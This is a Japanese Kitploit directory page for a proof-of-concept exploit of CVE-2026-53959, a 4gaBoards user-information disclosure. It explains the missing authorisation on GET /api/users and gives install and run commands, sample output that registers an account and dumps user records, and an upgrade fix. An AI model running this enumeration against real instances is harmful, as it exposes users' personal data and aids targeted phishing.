Skip to content
KitploitKITPLOIT
ツールブログ
提出
ツールブログ
提出

ハッキング、侵入テスト、サイバーセキュリティツールをあなたのセキュリティアーセナルに!

Kitploitはハッキング、サイバーセキュリティ、ペネトレーションテストのツールディレクトリです。最新のプロジェクトアップデートを見つけて、脆弱性の発見、システム分析、テストの自動化、セキュリティの強化を行いましょう。

··フィード·お問い合わせ·プライバシー·© 2026 Kitploit

ツールディレクトリ

カテゴリ

すべてのカテゴリを見る
Loading categories
CVE-2026-53959 — 4gaBoards < 3.3.9 - ユーザー情報の漏えい | Kitploit
ツール/GitHubGitHub/anirbala98/cve-2026-53959
脆弱性分析エクスプロイトウェブアプリケーション悪用情報収集ウェブセキュリティペネトレーションテスト学習と教育APIセキュリティ
GitHubanirbala98/cve-2026-53959

CVE-2026-53959

4gaBoards < 3.3.9 - ユーザー情報の漏えい

リポジトリを見る
11日前未レビュー

人気

すべて見る →

コミュニティで最も使われているツールを見つけましょう。

すべてのツールを探索

ツールコレクションを閲覧

すべてのツールを見る →
共有

CVE-2026-53959 - 4gaBoards < 3.3.9 - ユーザー情報の開示

このリポジトリには、CVE-2026-53959 の Proof of Concept(PoC) エクスプロイトが含まれています。

免責事項

このプロジェクトは、教育目的および許可されたセキュリティテストのみを目的として提供されています。所有していない、またはテストの許可を得ていないシステムに対して使用しないでください。

概要

4gaBoards は、リアルタイムプロジェクト管理のためのボードシステムです。バージョン 3.3.9 より前の 4gaBoards では、認証されたユーザーであれば誰でも GET /api/users を使用して全ユーザーのアカウント情報を列挙し、GET /api/users/:id を使用して任意のアカウントを取得できました。users/index および users/show アクションは、server/config/policies.js のデフォルトの is-authenticated ポリシーのみに依存しており、server/api/controllers/users/index.js は、リクエスト元ごとの認可やレスポンスのサニタイズを行わずに sails.helpers.users.getMany() の結果を返します。レスポンスには、メールアドレス、電話番号、所属組織、氏名、isAdmin、ssoGoogleEmail、ssoGithubEmail、その他の SSO 連携メールフィールドが含まれ、管理者のデータも対象となります。これにより、インスタンス全体のユーザー列挙、プライバシー漏洩、標的型フィッシングの偵察が可能になります。この問題はバージョン 3.3.9 で修正されています。

影響を受けるバージョン

コンポーネントバージョン
脆弱性あり<=3.3.8
修正済み3.3.9

必要条件

  • Python 3.13.14
  • Requests 2.32.5

インストール

root@kitploit:~
git clone https://github.com/anirbala98/CVE-2026-53959.git
cd CVE-2026-53959/
pip install -r requirements.txt

使用方法

root@kitploit:~
python exploit.py <base_url>
python exploit.py http://localhost:3000

実行例

root@kitploit:~
└─$ python exploit.py http://localhost:3000
[*] Creating a new user...
[+] Registration successful! 
[+] Retrieved Access Token: eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCIsImtpZCI6IjRjOTE1NzNmLTY5YzktNGQ5OS04ZWUxLWQ1ODZjNzZkNzAyZiJ9.eyJpYXQiOjE3ODcxMjExNzUsInN1YiI6IjE4NDQ5MDI5OTc5OTQyNDMzNTAiLCJleHAiOjE4MTg2NTcxNzV9.OwNTyxE-JS0pztbX4sLz0uzu3GjeyETNFQVbGVxzXxA

[*] Dumping user information...

{"items":[{"id":"1844837973439284230","createdAt":"2026-08-19T04:23:44.000Z","updatedAt":null,"email":"[email protected]","isAdmin":true,"isVerified":false,"name":"Demo Demo","username":"demo","phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":"2026-08-19T06:29:23.463Z","lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844837973439284230","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null},{"id":"1844902997994243350","createdAt":"2026-08-19T06:32:55.000Z","updatedAt":null,"email":"[email protected]","isAdmin":false,"isVerified":false,"name":"test","username":null,"phone":null,"organization":null,"ssoGoogleEmail":null,"ssoGithubUsername":null,"ssoGithubEmail":null,"ssoMicrosoftEmail":null,"ssoOidcEmail":null,"lastLogin":null,"lastEmailVerificationRequestAt":null,"deletedAt":null,"createdById":"1844902997994243350","updatedById":null,"deletedById":null,"isPasswordAuthenticated":true,"avatarUrl":null}]}

緩和策

4gaBoards をバージョン 3.3.9 以上にアップグレードしてください。

参考情報

  • https://www.tenable.com/cve/CVE-2026-53959
  • https://github.com/RARgames/4gaBoards/security/advisories/GHSA-p77f-p47g-h72p
ツールをダウンロード